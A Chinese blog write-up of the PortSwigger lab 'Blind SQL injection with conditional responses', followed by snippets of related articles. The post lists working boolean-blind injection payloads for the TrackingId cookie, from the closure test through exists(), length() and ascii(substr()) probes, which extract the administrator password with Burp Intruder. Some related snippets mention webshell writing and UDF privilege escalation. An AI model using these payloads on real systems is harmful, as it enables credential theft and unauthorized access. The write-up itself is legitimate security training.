Lab11_ Blind SQL injection with conditional responses

最新推荐文章于 2025-05-29 11:13:45 发布
最新推荐文章于 2025-05-29 11:13:45 发布
阅读量1.4k 收藏 15
点赞数 35
分类专栏: [BurpSuit官方实验室]SQL注入 文章标签: web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_53797419/article/details/145609810
版权

文章目录

前言:

实验室标题为:

利用条件响应进行 SQL 盲注

等级:执业者

简介:

本实验室包含一个盲 SQL 注入漏洞。应用程序使用跟踪 cookie 进行分析,并执行包含已提交 cookie 值的 SQL 查询。

SQL 查询结果不会返回,也不会显示错误信息。但应用程序包含一个 如果查询返回任何记录,则在页面中显示欢迎返回消息。

数据库包含一个名为users的不同表,其中有名为username和password的列。您需要利用盲 SQL 注入漏洞找出管理员用户的密码。

要解决实验问题,请以管理员用户身份登录。

进入实验室

显示为一个商店页面

根据已知信息,可以初步判断页面存在 cookie 布尔盲注

构造 payload

这里借助谷歌插件 EditThisCookie 来进行测试

依旧是先判断闭合,输入单引号+注释符,页面出现Welcome back!

xxxx' --

and 1=2 判断

输入 and 1=1,页面出现Welcome back!;输入 and 1=2,页面中Welcome back!消失

xxxxx' and 1=1 --

通关页面是否出现Welcome back!,可以确定存在布尔盲注

盲注不会将数据库的查询结果展示出来,只能依靠猜来判断表名

这就需要掌握几个常用的函数

length()

返回字符串的长度

substr()

截取字符串,substr(str,pos,len)

ascii()

返回字符串的 ascii 码

exists()

判断某表是否存在

官方实验室给出的 payload 如下:

xxxx' and (select 'a' from users limit 1)='a' --

select 后面跟着的是一个数字常量’a’,而不是具体的列名。这意味着不管 users 表里有什么数据,这个子查询都会返回’a’这个值。这里有一个 from users,所以这个子查询的执行应该依赖于 uses 表中是否有数据存在,也就是判断是否存在 uses 表。

limit 1 表示只返回结果中的第一行,整个子查询的作用应该是从 uses 表中选取一行,并返回一个包含 ‘a’的单列结果。如果 uses 表中有至少一行数据,那么这个子查询的结果就是’a’;如果 uses 表是空的,那么这个子查询就不会返回任何结果,或者说返回 null。在 sql 中 null 与任何值的比较都是 null,不是 true 或 false

这个等式的作用是检查 uses 表中是否存在至少一条记录。如果存在,则返回 true;否则返回 null 或 false,具体取决于数据库的实现。这种写法可能用于某些需要布尔判断的场景,比如在 where 子句中进行条件过滤或者作为返回布尔值的表达式

示例:

SELECT * FROM other_table WHERE (SELECT 'a' FROM users LIMIT 1) = 'a';

仅当 uses 表有数据时,才返回 other_table 的结果

与 exists 相比,exists(select 1 from uses)更直接高效,因为它无需比较值,只需要判断是否存在记录

在条件语句中(如 where)中,null 会被视为 false,因此当 users 表为空时,条件不成立

该等式通过固定值比较,间接实现了对 uses 表是否非空的检查,虽然可行,但更推荐 exists()

exists() 函数判断是否存在 users 表

xxxx' and exists(select 1 from users) --

判断是否存在 administrator 用户

xxxx' and exists(select 1 from users where username='administrator') --

length() 函数判断密码的位数

xxxx' and exists(select 1 from users where username='administrator' and length(password)=20) --

substr()函数切割字符结合 burp 爆破密码的 ascii 值

xxxx' and exists(select 1 from users where username='administrator' and ascii(substr(password,1,1))>3) --

再根据 ascii 码对照表确定密码

v52n8q900mg30upfvae0

成功登录管理员账户

官方实验的思路是直接爆破密码,同样是通关修改偏移量来确定密码的值

TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§

笔者的思路是通过爆破密码的 ascii 码值来确定密码

Lab: Blind SQL injection with conditional responses PRACTITIONER 带条件响应的SQL盲注靶场复盘
Zeker62的博客
08-18 687
靶场完成目标: This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie. The results of the SQL query are not returned, and no error message
Lab: Blind SQL injection with conditional errors带条件错误的盲注靶场复盘
Zeker62的博客
08-18 537
靶场要求: This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie. The results of the SQL query are not returned, and the application do
bp靶场---SQL注入第十一关(关于cookie的盲注)
m0_72471814的博客
01-12 843
先看描述,应用程序使用trackingcookie进行分析,说明这个trackingcookie可能可以利用,既不返回查询结果页不返回错误信息,但是查询正确会显示welcome back的信息,相当于一个只能回答是或不是的机器人,让我们来利用这个机器人来拿到账号密码进行登录即可过关,已知users表和username、password字段。here we go开始学习url还是有控制参数,但是此时对我们已经没有别的反应了参数随便输都没有报错信息所以我们使用bp进行抓包,从trackingID入手。
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 6145
BurpSuit官方实验室靶场-SQL注入通关记录。
【PortSwiggerのWeb Security Academy靶场】SQL Injection系列 9th
javagty6778的博客
01-05 161
Lab: Blind SQL injection with conditional responsesUrl: portswigger.net/web-securit…在带着 cookies的后续访问网页时会找到出现的 标志 ==> 无法回显 ==> 采用盲注的方式 0x03 爆破表名 0x04 爆破字段名 无法解决的痛点:函数无法使用(与此同时concat函数可以正常使用);没有无法select出结果(与此同时 无法select出结果)==> 导致的结果:没有办法一次性爆破出所有的select的
如何快乐地检测SQL注入
MSB_WLAQ的博客
09-30 2520
这估计大家也都发现了,测试SQL注入这种漏洞啊,又有WAF页面又没有明显的报错的情况下, 测试起来就是一个字,烦。 有waf: 我 and 1=1, 啪,它拦了。 我 order by, 啪,它拦了。 我 sleep(5), 啪,它拦了。 我 benchmark(50000000,MD5(1)), 啪,它又拦了。 页面不报错: 我 插入一个' 符号, 啪, 返回码还是200,不仅不报sql语句的错误,比如SQL syntax error near这种,连通用错误都不报,比如返回一个50...
利用BurpScanner提升手动测试效率:发现与扫描技巧
步骤一,打开实验室,通过Proxy>Intercept功能,启动Burp Suite的浏览器并访问易受SQL注入攻击的在线商店(<https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses>),这将展示一个...
PortSwigger SQL injection
mengzh620的博客
04-14 492
4.retrieving multiple values in a single column username||‘~’||password+FROM+users-- ~是用户名和密码之间的区分,用户自己加上的。1.Retrieval of hidden data ---- Modify the category parameter, giving it the value '+OR+1=1-- 能看到所有的目录。
portswigger网站sqli lab答案
12-03 696
burp网站sqli lab答案
bp靶场---SQL注入第十二关(关于cookie的盲注之报错)
m0_72471814的博客
01-14 1082
因为根据sql语法是先执行from后面的再执行select语句,如果from后面出错了则不会执行select语句,因为我们的select语句写的条件必为真所以必定执行将1/0的结果转化为字符串,又因为1/0是错误的式子,所以必定报错,由此判断密码长度大于1,使用'|| (select case when (1=1) then to_char(1/0) else '' end from users where username='administrator') ||',页面正常,说明存在。
SQL Blind Injection
土拨鼠挖洞中的博客
06-23 3238
Blind Injection是什么:SQL注入过程中,SQL语句执行后,执行的数据不能回显到前端,此时我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注; 类型基于bool 型:应用程序仅仅根据执行的sql语句返回True(页面)和False(页面); 基于时间型:所以我们利用函数来判断页面是否发生延迟 ,来判断是否发生注入,如果延迟,则执行失败。类似搜索这类请求,boolean注入也无...
(一)SQL注入实例
weixin_43047908的博客
04-09 2287
SQL injection UNION attack, determining the number of columns returned by the query GET /filter?category=Gifts HTTP/1.1 Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v=
1 SQL injection
(∪.∪ )...zzz的博客
04-18 1081
SQL injection 目录SQL injection一、What二、Influence三、SQL injection examples1.retrieving hidden data检索隐藏数据lab 12.subverting application logic颠覆应用程序逻辑lab2 SQL injection vulnerability allowing login bypass3.UNION attacks4. Examining the database检查数据库5.Blind SQL
sql盲注 解决_SQL 盲注漏洞
weixin_39943992的博客
12-19 1309
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy>>SQL injection >>Blind SQL injection翻译完毕...本部分,我们将描述什么是 SQL 盲注漏洞,并解释发现和利用 SQL 盲注漏洞的多种技术。什么是 SQL 盲注?当应用程序容易收到 SQL 注入,但其 HTTP 响应不包...
【网络安全】——Modbus协议详解:工业通信的“通用语言”
lingxw的博客
05-28 1239
本文系统介绍了Modbus工业通信协议的技术要点。从发展历史(1979年由Modicon公司推出)到核心特性(主从模式、四类存储区),详细解析了协议族分类(RTU/ASCII/TCP/Secure)及版本演进。重点剖析了RTU/TCP报文结构,并通过典型示例说明通信机制(功能码、时序流程)。文章还提供了开发工具推荐(ModbusPoll、libmodbus等)和学习路径。作为工业通信领域的事实标准,Modbus凭借其简单可靠的特性在工业4.0时代仍保持活力,并持续演进新形态(如Modbus over TSN
网络安全之XSS漏洞
anquan2233的博客
05-28 1082
然而,XSS 漏洞可以突破这一保护,攻击者可以通过注入恶意脚本来窃取用户的 Cookie,劫持用户的 Web 行为,甚至结合 CSRF(跨站请求伪造)进行针对性的攻击,进一步导致用户信息泄露或账户劫持等严重安全问题。与反射型和存储型 XSS 漏洞不同,基于 DOM 的 XSS 漏洞不需要用户数据出现在服务器的响应中,而是发生在客户端的 JavaScript 代码中。,简称 XSS),当应用程序将用户提交的数据发送到浏览器的页面中,但未经过适当的验证或转义时,就会引发跨站脚本(XSS)漏洞。
WEB安全--SQL注入--bypass技巧2
最新发布
m0_74800552的博客
05-29 547
sql注入将webshell写入服务器web目录中(需要知道物理路径)==> 服务器脚本提权 ==> 在蚁剑中执行系统命令。上传.dll/.so文件(需要知道物理路径)==> 进行系统提权(UDF) ==> 在数据库命令行执行系统命令。根据这一特性,我们可以尝试用普通的真假条件语句结合响应包中的内容去判断,可以将此sql时间盲注转化为类似布尔盲注的形式。某些复杂的正则或字符串处理函数在不同的输入下计算量不同,可造成微小但可检测的延迟。判断当前用户权限(至少需要有文件写权限)等待锁释放(通常可控制几秒)
网络安全方向在校生有哪些证书适合考取?
ailx10
05-27 736
网络安全领域,证书并非核心竞争力。作者花费1.1万考取CISSP证书后,发现高薪职位还需OSCP等更多认证。同事通过OSCP获得安全总监职位,而自己仍在基础岗位。2024年行业寒冬导致企业裁员、降薪,证书培训价格大幅下跌。最终感悟:实力远胜证书,花钱就能拿到的认证已丧失价值。行业变化证明,真正的能力才是立足之本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值